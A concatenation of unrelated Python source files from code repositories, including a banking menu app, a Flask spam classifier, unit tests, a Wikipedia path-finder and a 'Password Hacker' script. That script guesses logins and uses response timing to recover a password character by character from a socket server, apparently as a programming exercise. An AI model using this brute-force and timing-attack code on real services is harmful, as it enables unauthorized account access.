print_transfer_details()
print(f' Update recorded on: {dt_string}\n', '-' * 45, '\n\n')
with open('updates_inventory', 'wb') as updates_inventory_file:
pickle.dump(updates_inventory, updates_inventory_file)
with open('transactions_inventory', 'wb') as transactions_inventory_file:
pickle.dump(transactions_inventory, transactions_inventory_file)
def my_reports():
""" """
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
command = input('\n Enter password:\t')
flag = None
for user in users_inventory:
if user.password != command:
flag = True
pass
if user.password == command:
flag = None
break
if flag:
print('\n Invalid Password!')
exit()
print("\n 1. User's Balance."
"\n 2. All Accounts Transfers."
'\n 3. Single Account Transfers')
command1 = input(' Enter one of the options above:\t')
if command1 == '1':
print('\n Acc.N:___type___Balance:')
for account in accounts_inventory:
if account.owner == command:
if type(account) is DepositAccount:
mark = 'Deposit:'
else:
mark = 'Credit:'
print(f' {account.account_id} {mark} {account.balance:.2f} lv.')
elif command1 == '2':
my_accounts_list = []
for account in accounts_inventory:
if account.owner == command:
my_accounts_list.append(account.account_id)
for user in users_inventory:
if user.password == command:
print(f"\n{user.first_name} {user.last_name}'s Money Transfers Report:")
break
total_debit = 0
total_credit = 0
print('=' * 60, '\n', 'acc.N:', '...... amount <==> type ......... date ... time ...', '\n', '-' * 60)
for x in my_accounts_list:
for transaction in transactions_inventory:
if x == transaction.account_id:
if type(transaction) is Deposit:
total_debit += transaction.amount
print(' {:<6}'.format(transaction.account_id), ':', '{:.>12}'.format(transaction.amount),
'lv. <= Dt', '{:.>25}'.format(transaction.date_time))
else:
total_credit += transaction.amount
print(' {:<6}'.format(transaction.account_id), ':', '{:.>12}'.format(transaction.amount),
'lv. => Ct', '{:.>25}'.format(transaction.date_time))
print(' ', '-' * 60, f'\n Total: Dt:{total_debit:.2f}lv. Ct:{total_credit:.2f}lv.\n', '=' * 60)
elif command1 == '3':
account1 = input('\nEnter account number:\t')
print(f'\nAccount:{account1} Transactions Report:')
print('=' * 60, '\n', 'acc.N:', '...... amount <==> type ............. date time', '\n', '-' * 60)
total_debit = 0
total_credit = 0
for transaction in transactions_inventory:
if account1 == transaction.account_id:
if type(transaction) is Deposit:
total_debit += transaction.amount
print(' {:<6}'.format(transaction.account_id), ':', '{:.>12}'.format(transaction.amount),
'lv. <= Dt', '{:.>25}'.format(transaction.date_time))
else:
total_credit += transaction.amount
print(' {:<6}'.format(transaction.account_id), ':', '{:.>12}'.format(transaction.amount),
'lv. => Ct', '{:.>25}'.format(transaction.date_time))
print(' ', '-' * 60, f'\n Total: Dt:{total_debit:.2f}lv. Ct:{total_credit:.2f}lv.\n', '=' * 60)
else:
print('Invalid Number!')
def interest_calculator():
"""" Calculate interest and balance for period of months"""
def print_scedule():
if command == '1':
print('{:>4}'.format(month),'{:{width}.{prec}f}'.format(interest_amount, width=8, prec=2),
'{:{width}.{prec}f}'.format(pay_per_month, width=10, prec=2),
'{:{width}.{prec}f}'.format(balance, width=15, prec=2))
else:
print('{:>4}'.format(month), '{:{width}.{prec}f}'.format(balance, width=15, prec=2),
'{:{width}.{prec}f}'.format(interest_amount, width=8, prec=2),
'{:{width}.{prec}f}'.format(pay_per_month, width=10, prec=2))
command = input('\n 1. Deposit.'
'\n 2. Credit.'
'\n 3. Mortgage.'
'\n Enter type account from above\t')
type = input('\n 1. Person.'
'\n 2. Business.'
"\n Enter client's type from above:\t")
open_balance = float(input('\n Enter the beginning amount:\t'))
if command == '1':
pay_per_month = float(input(' Enter deposit per month:\t'))
else:
pay_per_month = None
interest = float(input(' Enter percentage interest per month:\t'))
period = int(input(' Enter number of months:\t'))
balance = open_balance
month = None
interest_amount = None
if command == '1':
print('\n', '======= DEPOSIT ACCOUNT SCHEDULE ======='
'\n month interest pay balance \n')
for month in range(1, period + 1):
interest_amount = balance * interest / 100
if balance < 1000:
interest_amount = 0
balance = balance + interest_amount + pay_per_month
print_scedule()
print('\n', '=' * 8, 'DEPOSIT SCHEDULE SUMMARY', '=' * 8,
f'\n If you open {open_balance:.2f} lv.Deposit Account'
f'\n and you add {pay_per_month:.2f} lv. per month,'
f'\n after {period} months you will have {balance:.2f} lv '
f'\n in your account. Thank you!\n', '=' * 42)
if command == '2':
if period > 36:
print("\n Sorry! Invalid Period.")
exit()
if (type == '1' and open_balance > 10000) or (type == '2' and open_balance > 100000):
print("\n Sorry! Invalid Credit Amount.")
exit()
print('\n', '======= CREDIT ACCOUNT SCHEDULE ======='
'\nmonth balance interest pay \n')
for month in range(1, period + 1):
pay_per_month = open_balance / period
interest_amount = balance * interest / 100
if type == '1' and month <= 3:
interest_amount = 0
if type == '2' and month <= 2:
interest_amount = 0
pay_per_month += interest_amount
print_scedule()
balance = balance - pay_per_month + interest_amount
if command == '3':
period_discount = None
discount_interest = None
credit = open_balance
months = period
principal_per_month: float = credit / months
sum_pay1 = 0
if type == '1':
period_discount = 6
discount_interest = 0
if type == '2':
period_discount = 12
discount_interest = interest * 0.5
amount = credit
pay = 0
for month in range(1, period_discount + 1):
interest_per_month = amount * discount_interest / 100
pay = principal_per_month + interest_per_month
sum_pay1 += pay
amount -= principal_per_month
print('\n', '========= MORTGAGE ACCOUNT SCHEDULE ========='
'\nmonth balance principal interest pay\n')
amount = credit
pay = sum_pay1 / period_discount
for month in range(1, period_discount + 1):
interest_per_month = amount * discount_interest / 100
principal_per_month = pay - interest_per_month
print('{:>4}'.format(month), '{:{width}.{prec}f}'.format(amount, width=10, prec=2),
'{:{width}.{prec}f}'.format(principal_per_month, width=8, prec=2),
'{:{width}.{prec}f}'.format(interest_per_month, width=8, prec=2),
'{:{width}.{prec}f}'.format(pay, width=10, prec=2))
amount -= principal_per_month
months2 = months - period_discount
r1 = int(amount / months2)
r2 = int(r1 + amount * interest / 100)
amount2 = amount
for pay_per_month in range(r1, r2):
amount2 = amount
count = 0
for _ in range(months2):
ppm = pay_per_month - amount2 * interest / 100
amount2 -= ppm
count += 1
if amount2 <= 0:
break
if amount2 <= 0:
break
for month in range(period_discount + 1, months):
interest_per_month = amount * interest / 100
principal_per_month = pay_per_month - interest_per_month
print('{:>4}'.format(month), '{:{width}.{prec}f}'.format(amount, width=10, prec=2),
'{:{width}.{prec}f}'.format(principal_per_month, width=8, prec=2),
'{:{width}.{prec}f}'.format(interest_per_month, width=8, prec=2),
'{:{width}.{prec}f}'.format(pay_per_month, width=10, prec=2))
amount -= principal_per_month
interest_per_month = amount * interest / 100
print(f' {months} {amount:.2f} 0.00'
f' {interest_per_month:.2f} '
f'{(amount + interest_per_month):.2f}'
'\n', '-' * 45)
print('\n', '=' * 10, ' MORTGAGE SCHEDULE SUMMARY: ', '=' * 10,
f'\n For total {open_balance:.2f} lv. in period of {months} months,'
f'\n you will pay in first {period_discount} months: {pay:.2f} lv/mo,'
f'\n then in next {months - period_discount - 1} months you will pay: {pay_per_month:.2f} lv/mo'
f'\n and in a last month you will pay {(amount + interest_per_month):.2f} lv.'
'\n Thank you!\n', '-' * 50)
def updates_report():
""" Admin gets all updates records"""
# updates_inventory = []
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
print('\n', '{:*^60}'.format(' UPDATES REPORT '))
print(' Accounts Updates:')
for account in updates_inventory:
if type(account) is AccountUpdate:
print('{:15}'.format(account.acc_id), '{:>12}'.format(account.old_detail),
'{:>12}'.format(account.new_detail), '{:25}'.format(account.date_time))
print('-' * 60)
print(' Transfers Updates:')
for update in updates_inventory:
if isinstance(update, TransferUpdate):
if not update.old_detail or not update.new_detail:
continue
print('{:15}'.format(update.acc_id), '{:>12}'.format(update.old_detail),
'{:>12}'.format(update.new_detail), '{:25}'.format(update.date_time))
print('-' * 60)
print('\n Profiles Updates:')
for user in updates_inventory:
if type(user) is UserUpdate:
print('{:15}'.format(user.user_name), '{:>12}'.format(user.old_detail),
'{:>12}'.format(user.new_detail), '{:25}'.format(user.date_time))
print('-' * 60, '\n', 'All updates done to:', dt_string)
def admin_users():
    """Admin sub-menu: dispatch the chosen user-management action."""
    actions = {'1': all_users_list, '2': my_reports, '3': user_update}
    command = input('\n 1. All Users List.'
                    '\n 2. One User Transfers.'
                    '\n 3. User Update.'
                    '\n 4. <= Back.'
                    '\n Enter one of the options above:\t')
    # Option '4' (and any unknown input) simply falls through / goes back.
    if command in actions:
        actions[command]()
def admin_accounts():
    """Admin sub-menu: dispatch the chosen account-management action."""
    actions = {'1': all_accounts, '2': new_account, '3': account_update}
    command = input('\n 1. All Accounts.'
                    '\n 2. Open New Account.'
                    '\n 3. Account Update.'
                    '\n 4. <= Back.'
                    '\n Enter one of the options above:\t')
    # Option '4' (and any unknown input) simply falls through / goes back.
    if command in actions:
        actions[command]()
def admin_transfers():
    """Admin sub-menu: dispatch the chosen transfer-management action."""
    actions = {'1': all_transactions, '2': transfer, '3': transfer_update}
    command = input('\n 1. All Transfers.'
                    '\n 2. Money Transfer'
                    '\n 3. Transfer Update.'
                    '\n 4. <= Back.'
                    '\n Enter one of the options above:\t')
    # Option '4' (and any unknown input) simply falls through / goes back.
    if command in actions:
        actions[command]()
| true |
99e79eb6ecdf4c5570333b93c078e7307cdc56db | Python | nikhilchandrapoddar099/Spam_mail_Classifier | /main.py | UTF-8 | 2,099 | 2.703125 | 3 | [] | no_license |
#for mail Extraction online
import pandas as pd
import pickle
from flask import Flask, render_template, request
import re
import nltk
nltk.download("stopwords")
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
app = Flask(__name__)
@app.route('/')
def student():
    """Render the landing page (templates/home.html) with the input form."""
    return render_template('home.html')
def _clean_text(text, stemmer, stop_words):
    """Keep letters only, lower-case, drop stopwords and stem the rest."""
    words = re.sub('[^a-zA-Z]', ' ', text).lower().split()
    return " ".join(stemmer.stem(word) for word in words if word not in stop_words)


@app.route('/result',methods = ['POST', 'GET'])
def fun1():
    """Handle the classifier form: preprocess the submitted text, train a
    bag-of-words spam model on spam.csv and render the prediction.

    NOTE(review): the model is retrained from scratch on every request;
    training once at startup and caching it would be far faster.
    """
    if request.method == 'POST':
        p1 = request.form["p1"]    # read for form compatibility (currently unused)
        p2 = request.form["p2"]    # read for form compatibility (currently unused)
        test = request.form["p3"]  # the email text to classify
        data = pd.read_csv("spam.csv")
        stemmer = PorterStemmer()
        # A set gives O(1) per-word lookup; the original re-read the whole
        # stopword list from disk for every single word.
        stop_words = set(stopwords.words("english"))
        # Works for any corpus size instead of the hard-coded 5572 rows.
        corpus = [_clean_text(data['EmailText'][i], stemmer, stop_words)
                  for i in range(len(data))]
        from sklearn.feature_extraction.text import CountVectorizer
        cv = CountVectorizer()
        x = cv.fit_transform(corpus).toarray()
        from sklearn.preprocessing import LabelEncoder
        # 1-D label vector (the original reshaped to (n, 1), which makes
        # sklearn emit a column-vector warning).
        y = LabelEncoder().fit_transform(data.iloc[:, 0].values).astype('int')
        test_vector = cv.transform([_clean_text(test, stemmer, stop_words)]).toarray()
        from sklearn.ensemble import BaggingClassifier
        model = BaggingClassifier()
        model.fit(x, y)
        pred = model.predict(test_vector)
        # Encoded label 0/1 -> human-readable verdict (presumably
        # 'ham' < 'spam' alphabetically — confirm against spam.csv labels).
        if pred[0] == 0:
            d = "Not Spam"
        elif pred[0] == 1:
            d = "Spam"
        else:
            d = "null"
        return render_template("result.html", result = d)
if __name__ == '__main__':
    # Local development server only; debug=True enables the auto-reloader.
    app.run(host="127.0.0.1",port=8080,debug=True)
f33f191a4fc8de8928f9341414b4e97ae32a4ae4 | Python | kalimuthu123/CapAI | /tests/test_utils.py | UTF-8 | 1,467 | 2.921875 | 3 | [
"MIT"
] | permissive | import os
from ln2sql.parser import Parser
from ln2sql.stopwordFilter import StopwordFilter
BASE_PATH = os.path.dirname(os.path.dirname(__file__)) # Project directory.
STOPWORDS_PATH = os.path.join(BASE_PATH, 'ln2sql/stopwords/')
def test_parser_sort_length():
    """Longer phrases must come first after transformation_sort."""
    input_list = ['len2 len2', 'len1', 'len3 len3 len3']
    expected = ['len3 len3 len3', 'len2 len2', 'len1']
    assert Parser.transformation_sort(input_list) == expected
def test_parser_sort_length_lexical():
    """Equal-length phrases are ordered lexically ('alen3…' before 'len3…')."""
    input_list = ['len2 len2', 'len1', 'len3 len3 len3', 'alen3 alen3 alen3']
    expected = ['alen3 alen3 alen3', 'len3 len3 len3', 'len2 len2', 'len1']
    assert Parser.transformation_sort(input_list) == expected
def test_english_stopword_filter():
    """English stopwords are removed and the output is lower-cased."""
    stopwordFilter = StopwordFilter()
    stopwordFilter.load(STOPWORDS_PATH + 'english.txt')
    input_sentence = 'The cat drinks milk when the dog enter in the room and his master look the TV of the hostel'
    expected = 'cat drinks milk dog enter room master tv hostel'
    assert stopwordFilter.filter(input_sentence) == expected
def test_french_stopword_filter():
    """French stopwords are removed; accents are stripped ('hôtel' -> 'hotel')."""
    stopwordFilter = StopwordFilter()
    stopwordFilter.load(STOPWORDS_PATH + 'french.txt')
    input_sentence = "Le chat boit du lait au moment où le chien rentre dans la maison et que son maître regarde la TV de l'hôtel"
    expected = 'chat boit lait chien rentre maison maitre regarde tv hotel'
    assert stopwordFilter.filter(input_sentence) == expected
cadff361cc26943685cdbdbc25212156f725e1bc | Python | sugacom/AllOfTestFiles | /triangle.py | UTF-8 | 207 | 3.75 | 4 | [] | no_license | class Triangle:
    def __init__(self, b, h):
        # b: base length, h: height of the triangle.
        self.base = b
        self.height = h
def cal_area(self):
return self.base * self.height / 2
# Smoke test: a 3 x 5 triangle has area 7.5.
tri1 = Triangle(3, 5)
print(tri1.cal_area())
| true |
d735781cab4d4b347421b30e1cf6cd8a0bc124aa | Python | arjunlohan/Password-Hacker | /Password Hacker.py | UTF-8 | 2,950 | 2.65625 | 3 | [] | no_license | # write your code here
import sys
import socket
import itertools
import json
from datetime import datetime
def letters(word):
    """Return every lower/upper-case variant of *word*, in the same order
    as the original recursive version (last character varies fastest).

    Generalized: letters("") now returns [""] instead of raising
    IndexError, and deep recursion on long words is avoided.
    """
    variants = ([ch.lower(), ch.upper()] for ch in word)
    return ["".join(combo) for combo in itertools.product(*variants)]
# Candidate character sets for the brute force.
a_z = [chr(x) for x in range(ord('a'), ord('z') + 1)]
A_Z = [chr(x).upper() for x in range(ord('a'), ord('z') + 1)]
zero_nine = [str(i) for i in range(0,10)]
#alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789'
#letters = {"a-z": "abcdefghijklmnopqrstuvwxyz", "A-Z": "ABCDEFGHIJKLMNOPQRSTUVWXYZ", "0-9": "0123456789"}
#password = open('/Users/arjunlohan/Downloads/passwords.txt', 'r')
login = open("/Users/arjunlohan/Downloads/logins.txt", 'r')
# Target host/port come from the command line: <script> IP PORT
args_list = sys.argv
IP = str(args_list[1])
port = int(args_list[2])
break_while_loop = ""
with socket.socket() as hack_socket:
    address = (IP,port)
    hack_socket.connect(address)
    response = 0
    lenght = 1
    # NOTE(review): a_z appears twice in the candidate list — presumably a
    # duplicate; confirm whether intentional.
    password_list = a_z + zero_nine + A_Z + a_z
    password_empty = " "
    response_time = []
    # Try each candidate login with a dummy password; a "Wrong password!"
    # reply means the login exists and we start the timing attack on it.
    for i in login:
        message = {"login": i.strip(), "password": password_empty}
        message = json.dumps(message)
        #print(message)
        hack_socket.send(message.encode())
        response = hack_socket.recv(1024)
        #response = response.decode()
        response_json = json.loads(response)
        #print(response_json)
        if str(response_json) == "{'result': 'Wrong password!'}":
            z = 0
            password = ""
            # Timing side-channel: a noticeably slower "wrong password"
            # response means the current prefix + candidate char is correct.
            while break_while_loop != "Connection success!":
                #print(z)
                password_input = password + password_list[z]
                #print(password_input)
                message = {"login": i.strip(), "password": password_input}
                #print(password_list[z])
                message = json.dumps(message, indent=1)
                start = datetime.now()
                hack_socket.send(message.encode())
                response = hack_socket.recv(1024)
                finish = datetime.now()
                difference = finish - start
                response_time.append(difference)
                # response = response.decode()
                response_json = json.loads(response)
                #print(response_json)
                result = str(response_json)
                #print(result)
                #print(difference)
                if result == "{'result': 'Wrong password!'}":
                    # str(timedelta) ends in the microsecond field; > 6000 us
                    # is treated as the server's artificial delay for a
                    # correct character.
                    if int(str(difference)[-6::]) > 6000:
                        password += password_list[z]
                        z = 0
                    else:
                        z += 1
                elif result == "{'result': 'Connection success!'}":
                    # Full credentials found — print the winning JSON payload.
                    print(message)
                    #print(password_input)
                    break_while_loop = "Connection success!"
                else:
                    pass
            if break_while_loop == "Connection success!":
                break
3d81ff8f1c734699d8d97fdc2e9b8977b1b094aa | Python | daliagachc/sara-cluster | /sara_cluster/util.py | UTF-8 | 1,064 | 2.609375 | 3 | [] | no_license | # project name: sara-cluster
# created by diego aliaga daliaga_at_chacaltaya.edu.bo
from useful_scit.imps import *
def hist_better(ds,col,**dp_qwargs):
    """Plot a log-binned histogram of `ds[col]` restricted to the 2nd–98th
    percentile range; extra kwargs are forwarded to seaborn's distplot.

    Assumes `ds` has a `to_dataframe()` method (presumably an xarray
    Dataset) and that `sns`/`np` come from the star import — TODO confirm.
    """
    # col = NCONC01
    ds1 = ds[[col]].to_dataframe()
    ds2 = ds1.dropna()
    # 2% / 98% quantiles bound the histogram range.
    q1,q2 = ds2.quantile([.02,.98]).values
    # 20 logarithmically spaced bin edges between the two quantiles.
    lg = np.logspace(np.log10(q1),np.log10(q2),20)
    ax = sns.distplot(
        ds2[q1<ds2][q2>ds2].dropna(),bins=lg.flatten(),kde=False,
        **dp_qwargs
    )
    ax.set_xscale('log')
    ax.set_title(col)
def hist_better_mult(ds,cols):
    """Draw one log-binned histogram per column on a shared-y row of axes."""
    n_cols = len(cols)
    fig, axes = plt.subplots(1, n_cols, figsize=(5 * n_cols, 3), sharey=True)
    for column, axis in zip(cols, axes.flatten()):
        hist_better(ds, column, ax=axis)
class MadeUp:
    """Placeholder/stub class — construction currently has no effect."""
    def __init__(self,col:str,df:pd.DataFrame):
        # NOTE(review): the commented call passes (col, df) but
        # custom_winsorize takes (df, col) — fix the order if re-enabled.
        # self.custom_winsorize(col, df)
        pass
def custom_winsorize(df:pd.DataFrame, col:str, quan=0.05):
    """Mask values of df[col] outside the open (quan, 1-quan) quantile band
    with NaN. Mutates *df* in place and returns it.
    """
    series = df[col]
    lower, upper = series.quantile([quan, 1 - quan])
    inside = (series > lower) & (series < upper)
    df[col] = series.where(inside)
    return df
cdfb642c12c3a4777f79368bc0ffaa2b0328b853 | Python | mhfarahani/WikiRacer | /src/WikiRacer.py | UTF-8 | 5,322 | 3.234375 | 3 | [] | no_license | import sys
import wikipedia
import json
from collections import deque
#from flask import Flask
import networkx as nx
#import matplotlib.pyplot as plt
import time
from bs4 import BeautifulSoup
from urllib.request import urlopen
import re
def GetTitles(title,verbose=True):
    """
    Given a title of a Wikipedia page, this function returns
    the titles of the Wikipedia links in the page.
    Returns [] when the page cannot be fetched or parsed.
    Note: The Wikipedia module uses the BeautifulSoup module and
    it does not always use the best HTML parser in python 3.
    """
    if verbose:
        try:
            print(title)
        except UnicodeEncodeError:
            # Some console encodings (e.g. 'gbk') cannot print every title.
            print("Warning: 'gbk' can not encode unicode characters")
    try:
        page = wikipedia.page(title)
        return page.links
    except Exception:
        # Narrowed from a bare `except:`, which would also swallow
        # KeyboardInterrupt/SystemExit.
        return []
def GetTitleOfLink(url):
    """
    Given a Wikipedia URL, this function returns the title of
    the page.
    """
    wiki_html = urlopen(url).read()
    parsed_html = BeautifulSoup(wiki_html,'html.parser')
    # The page title lives in <h1 id="firstHeading">...</h1>.
    title_html = parsed_html.find('h1',attrs={'id':'firstHeading'})
    # NOTE(review): regex runs on str(tag); if it does not match (e.g.
    # title with punctuation), title is None and .group() raises.
    title = re.search('>([\w\s\d]+)</',str(title_html))
    print(title.group(1))
    return title.group(1)
def GetUrls(titles):
    """
    Return the Wikipedia URL for each page title in *titles*.
    titles: A list of Wikipedia page titles.
    """
    return [wikipedia.page(title).url for title in titles]
def GetInputs(file_path):
    """
    Read the JSON race description at *file_path* and return the
    (start_title, end_title) pair used in the wiki race.
    file_path: Path to the input JSON file with "start"/"end" URLs.
    """
    # Context manager guarantees the file is closed even if json.load
    # raises (the original leaked the handle in that case).
    with open(file_path, 'r') as ajson:
        input_json = json.load(ajson)
    start_title = GetTitleOfLink(input_json['start'])
    end_title = GetTitleOfLink(input_json['end'])
    return start_title, end_title
def TimeElapsed(starting_time):
    """
    This function returns the elapsed time of the search.
    starting_time: The clock time when the Wikiracer start searching
    """
    # NOTE(review): time.clock() was removed in Python 3.8; this (and the
    # matching calls in FindShortestPath) must migrate together to
    # time.perf_counter() since both sides must use the same clock.
    current_time = time.clock()
    return current_time - starting_time
def ConvertToJson(start_title,target_title,alist,file_path):
    """
    Write the race result to *file_path* in JSON format.
    start_title: The title of the starting page
    target_title: The title of the end page
    alist: A list of the titles of the shortest path
    file_path: A path to the output file
    """
    # Resolve all URLs first so the output file is not created/truncated
    # if a network lookup fails (the original opened the file up front).
    url_dict = {"start": GetUrls([start_title]),
                "end": GetUrls([target_title]),
                "path": GetUrls(alist)}
    with open(file_path, 'w') as output_file:
        json.dump(url_dict, output_file)
def FindShortestPath(start,target,max_time = 3600):
    """
    This function uses a graph to represent link-connectivity
    between the start and end pages. The shortest path is
    found using the Dijkstra's algorithm.
    start: Title of the starting page (A graph node)
    target: Title of the end page (A graph node)
    max_time: The time limit in seconds that the Wikiracer is
              allowed to search for the path.
    """
    # NOTE(review): time.clock() was removed in Python 3.8 (see TimeElapsed).
    start_time = time.clock()
    print('WikiRacer is searching for the shortest path between %s \
    and %s. Please be patient!' %(start,target))
    graph = nx.Graph()
    queue = deque()
    queue.append(start)
    found = False
    timeout = False
    # Breadth-first expansion over a snapshot of the queue; every expanded
    # page's links are added as graph edges.
    # NOTE(review): there is no visited set, so pages can be re-queued and
    # re-fetched; on timeout the function falls off the end and returns
    # None, which the caller unpacks into two values (TypeError).
    while not found and not timeout:
        for item in list(queue):
            titles = GetTitles(item)
            '''check whether target is in the titles'''
            if target in titles:
                graph.add_edge(item,target)
                print('Processing time: %i sec' % TimeElapsed(start_time))
                return nx.dijkstra_path(graph,start,target),graph
                # Unreachable: the return above exits first.
                found = True
                break
            for title in titles:
                queue.append(title)
                graph.add_edge(item,title)
            queue.popleft()
        current_time = time.clock()
        processing_time = TimeElapsed(start_time)
        if processing_time >= max_time:
            timeout = True
def main():
    """
    This function reads the folder pathes for input and output
    files and pass it to FindShortestPath function to find the
    path between start and end pages.
    """
    args = sys.argv[1:]
    if not args:
        print ("Error: Please add the '[input_file output_file]' to \
    your execution command.")
        sys.exit(1)
    input_path = args[0]
    output_path = args[1]
    starting_title,ending_title = GetInputs(input_path)
    # NOTE(review): if FindShortestPath times out it returns None and this
    # unpacking raises TypeError before the try/except below is reached.
    min_path,graph = FindShortestPath(starting_title,ending_title)
    ConvertToJson(starting_title,ending_title,min_path,output_path)
    try:
        print('Path found:')
        print(min_path)
    except:
        print('Path not found')
# Script entry point: python WikiRacer.py <input.json> <output.json>
if __name__ == '__main__':
    main()
| true |
f111c4b56bfd7a144d625f0102520e71a9129a8f | Python | rjgcabrera/CS21A | /Empty.py | UTF-8 | 394 | 2.59375 | 3 | [] | no_license | # -----------------------------------------------------------------------------
# Name: empty
# Purpose: empty exception for stack ADT
#
# Author: Raymond Cabrera
#
# Created: 10/04/2013
# -----------------------------------------------------------------------------
class Empty(Exception):
    """
    Error attempting to access an element from an empty container
    (e.g. pop/peek on an empty stack).
    """
    pass
31b18a29bfcf356dde3176575570e43a5aa8f83b | Python | cpatrizio88/A405 | /python/nchaparrday4/Day4.py | UTF-8 | 1,637 | 3.3125 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
import scipy.io
def probfv(C, a, v, T):
    """Maxwell–Boltzmann-style speed distribution: C * v^2 * exp(-a*v^2/2).

    T is accepted for call-site compatibility but not used in the formula.
    """
    exponent = -(a * v ** 2) / 2.0
    return C * v ** 2 * np.exp(exponent)
def calc_testmean(v, fv):
    """Accumulate sum_i v[i] * fv[i] (a discrete expectation value)."""
    total = 0
    for idx in range(len(v)):
        total += v[idx] * fv[idx]
    return total
# NOTE(review): this script uses Python 2 print statements below.
#Constants and Factors
k_B = 1.38065*10**(-23) # m^2 kg s^-2 K^-1, Boltzman Constant
Na = 6.0221415*10**(23) #avogadro's number
m =(1.0*28/Na)*10**(-3) #kg, mass of Nitrogen molecule (N2)
T = np.array([270,370]) #K, the two given temperatures
a = 1.0*m/(k_B*T) #factor
C = np.sqrt((1.0*2/np.pi)*(a)**3) #factor
#Calculations
v = np.arange(0, 2500, 1) #molecular velocity array
fv0 = probfv(C[0], a[0], v, T[0]) #probability distribution function of velocity at 270K
fv1 = probfv(C[1], a[1], v, T[1]) #probability distribution function of velocity at 370K
mean = np.array([np.dot(fv0, v), np.dot(fv1, v)]) #mean velocties at 270K and 370K, calculated by dot product of velocity and pdf matrices
testmean = np.array([calc_testmean(v, fv0), calc_testmean(v, fv1)])# as above except by elemental multiplication and summing
anmean = np.array([2*C[0]/a[0]**2, 2*C[1]/a[1]**2]) #analyitic mean from integration by parts of vf(v)
#Printouts
print 'mean velocities', mean
print 'test on mean velocities', testmean
print 'analytic mean velocities', anmean
#plots
fig = plt.figure(1)
ax1=fig.add_subplot(111)
ax1.set_title('Molecular Velocity vs its Probability Function')
ax1.set_xlabel('v (m/s)')
ax1.set_ylabel('f(v)')
ax1.plot(v, fv0, 'b', label='at 270K')
ax1.plot(v, fv1, 'r', label='at 370K')
ax1.legend(loc='upper right')
plt.show()
| true |
30aaa28cf42bbc43060988ce8c7ea24cf72c1bb5 | Python | anhnn2010/scrapy | /caring/caring/spiders/caring_1.py | UTF-8 | 4,769 | 2.734375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
import scrapy
from ..items import CityItem, CountryItem, CompanyItem
class Caring1Spider(scrapy.Spider):
    """Scrapy spider that crawls caring.com senior-care listings:
    state pages -> city/county summaries -> company listings -> descriptions.
    """
    name = 'caring_1'
    # allowed_domains = ['caring.com']
    start_urls = ['https://www.caring.com/']
    def parse(self, response):
        """Home page: collect state links and queue one senior-care page per state."""
        list_state_hrefs = response.xpath("//*[@id='top-states']//a/@href").getall()
        # The state key is the last path segment of each href.
        list_state_keys = [i.split('/')[-1] for i in list_state_hrefs]
        base_url = 'https://www.caring.com/senior-care'
        list_url_cares = [f'{base_url}/{state}' for state in list_state_keys]
        for url in list_url_cares:
            yield scrapy.Request(url=url, callback=self.parse_summary)
    def parse_summary(self, response):
        """State page: yield CityItem/CountryItem summaries and queue county pages."""
        list_cities = response.xpath("//*[@id='cities']//div[@class='lrtr-list-item']")
        # Last breadcrumb entry is the state name.
        state = response.xpath("//ol[@class='breadcrumb']//a/text()")[-1].get()
        # ### inspect response by scrapy shell
        # from scrapy.shell import inspect_response
        # inspect_response(response, self)
        # ###
        # city = list_cities[0]
        for city in list_cities:
            city_name = city.xpath(".//a/text()").get()
            city_sum = city.xpath("./div[@class='text-subtitle2']/text()").get().strip()
            # print(f'{city_name}: {city_sum}')
            city_item = CityItem()
            city_item['state'] = state
            city_item['city'] = city_name
            city_item['total'] = city_sum
            yield city_item
        ### start country ###
        list_countries = response.xpath("//*[@id='counties']//div[@class='lrtr-list-item']")
        # country = list_countries[0]
        for country in list_countries:
            country_name = country.xpath(".//a/text()").get()
            country_sum = country.xpath("./div[@class='text-subtitle2']/text()").get().strip()
            # print(f'{country_name}: {country_sum}')
            country_item = CountryItem()
            country_item['state'] = state
            country_item['country'] = country_name
            country_item['total'] = country_sum
            yield country_item
            country_url = country.xpath(".//a/@href").get()
            yield scrapy.Request(url=country_url, callback=self.parse_country)
        ### end country ###
    def parse_country(self, response):
        """County page: scrape each company card and queue its detail page,
        forwarding the scraped fields via cb_kwargs."""
        country = response.xpath("//ol[@class='breadcrumb']//a/text()")[-1].get()
        state = response.xpath("//ol[@class='breadcrumb']//a/text()")[-2].get()
        ### start company ###
        list_companies = response.xpath("//div[@class='search-result']")
        # company = list_companies[0]
        for company in list_companies:
            company_name = company.xpath(".//div[@class='details']/h3//a/text()").get()
            if company.xpath(".//span[@class='count']/a/text()"):
                # e.g. "12 reviews" -> "12"
                review_num = company.xpath(".//span[@class='count']/a/text()").re(r'(\d+) review')[0]
            else:
                self.log(f'There is no reviewer for this company: {response.url}')
                review_num = None
            if company.xpath(".//input/@value"):
                review_star = round(float(company.xpath(".//input/@value").get()), 1)
            else:
                self.log(f'There is no star for this company: {response.url}')
                review_star = None
            review_text = company.xpath(".//div[@class='hidden-xs']/div[@class='description']/text()").get().strip().strip('"')
            company_info = {
                'state': state,
                'country': country,
                'name': company_name,
                'review_num': review_num,
                'review_star': review_star,
                'review_text': review_text
            }
            link = company.xpath(".//a[contains(@class, 'btn-secondary')]/@href").get()
            url = link + '#description'
            # dont_filter: several companies can share a landing URL.
            req = scrapy.Request(url=url, callback=self.parse_desc, cb_kwargs=company_info, dont_filter=True)
            yield req
        ### end company ###
    def parse_desc(self, response, **kwargs):
        """Company detail page: append the long description and yield the item."""
        # print(reponse.url)
        company = kwargs
        text = response.xpath("//*[@id='description']/div//p/text()").getall()
        description = '\n'.join(text).strip()
        company['description'] = description
        company_item = CompanyItem()
        company_item['state'] = company['state']
        company_item['country'] = company['country']
        company_item['name'] = company['name']
        company_item['service'] = 'Home Care'
        company_item['total_review'] = company['review_num']
        company_item['star'] = company['review_star']
        company_item['review_text'] = company['review_text']
        company_item['description'] = company['description']
        yield company_item
| true |
1a2149840f48aa23b84f5d3d0ff4530585b1c403 | Python | cloew/WiiCanDoIt-Framework | /src/GameEventParser/GameEventLogger.py | UTF-8 | 384 | 2.515625 | 3 | [] | no_license | import time
import os
import pickle
class GameEventLogger:
    """Append-only pickle log of game events; one file per session,
    named after the current UNIX timestamp.
    """
    # File handle, opened in binary write mode by __init__.
    logfile = None

